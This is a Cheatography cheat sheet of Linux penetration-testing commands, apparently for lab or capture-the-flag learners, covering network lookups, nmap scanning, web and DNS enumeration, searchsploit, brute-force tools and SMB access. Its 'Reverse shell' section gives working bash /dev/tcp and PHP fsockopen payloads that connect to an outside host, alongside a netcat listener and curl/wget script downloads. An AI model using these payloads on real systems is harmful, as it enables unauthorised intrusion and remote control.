Show Menu
Cheatography

Linux Hacking Basic Cheat Sheet by

  1. Home >
  2. Software >
  3. >
  4. Linux Hacking Basic Cheat Sheet

Basic networking

Show IP config­uration
ip a s
DNS lookup
dig host-n­ame.com
DNS Reverse lookup
dig -x 10.10.1­0.12
Lookup DNS entries for a host or ip
nslookup google.com
IP for hostname
host google.com

Http Download

Using curl
curl http:/­/ho­st:­808­0/f­ile.sh - o output.sh
Using wget
wget http:/­/ho­st:­808­0/f­ile.sh

Enumer­ation

Portscan (first 10000 ports)
nmap -sC -sV 10.10.1­0.12
Portscan (all ports)
nmap -p- -sV 10.10.1­0.12
Portscan (UDP)
nmap -sU 10.10.1­0.12
Gobuster
gobuster -w wordli­st.txt dir -u http:/­/10.10.10.12
Dirb
dirb http:/­/10.10.10.12 wordli­st.txt
Wordpress enumer­ation
Website technology enumer­ation
DNS Enumer­ation
dnsrecon -d google.com -n 10.10.1­0.12
DNS Zonetr­ansfer
dnsrecon -t axfr -d zonetr­ans­fer.me
List subdomains
sublist3r -d target­-ho­st.com
Wordlists can be found at
/usr/­sha­re/­wor­dli­sts­/di­rbu­ster/
 

Find target in network

Readout ARP cache
ip neigh
Nmap Host Discovery
nmap -sn 10.10.1­0.0/24
TCP scan
nmap -Pn 10.10.1­0.0/24

Serving own data

Python2 Webserver (current folder)
python -m Simple­HTT­PServer 8080
Python3 Webserver (current folder)
python3 -m http.s­erver 8080
Listen on port
nc -lvnp 8080

Exploit DB

Search for exploit
search­sploit apache
View exploit
search­sploit -x path/t­o/e­xploit
Copy exploit to current directory
search­sploit -m path/t­o/e­xploit

Brute forcing

Bruteforce websites (e.g. login)
hydra
Bruteforce website paths
wfuzz
Crack files
john
Check each man-page to find the detailed command parameters

Server Message Block (SMB)

SMB enumer­ation tool
smbmap -H 10.10.1­0.12
SMB network browser
smbtree
SMB Client
smbclient //10.1­0.1­0.12/
 

Useful commands

Change directory
cd folder
Create directory
mkdir foldername
Delete file
rm file.jpg
Delete folder
rm -r folder
Search string in file
grep pattern file.txt
Find file in a folder
find /path -name "­*.x­ml"
Edit file (vi)
vi file.txt

Reverse shell

Bash
bash -i >& /dev/t­cp/­10.0.0.1/8080 0>&1
PHP
$sock=­fso­cko­pen­("10.0.0.1­"­,12­34)­;ex­ec(­"­/bin/sh -i <&3 >&3 2>&3");
Other webshells can be found at
/usr/­sha­re/­web­she­lls/

File analysis

What is this file?
file unknown.x
Is there something hidden?
binwalk file.png
Extract hidden content
binwalk -e file.png

Encodi­ng/­Dec­oding

Text to base64
echo -n "­tex­t" | base64
base64 to text
echo -n "­dGV­4dA­==" | base64 -d
hexeditor
xxd
 

Metadata

  • Languages:
  • Published: 11th February, 2020

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Linux Command Line Cheat Sheet
          mod_rewrite Cheat Sheet
          Vim NERDTree Cheat Sheet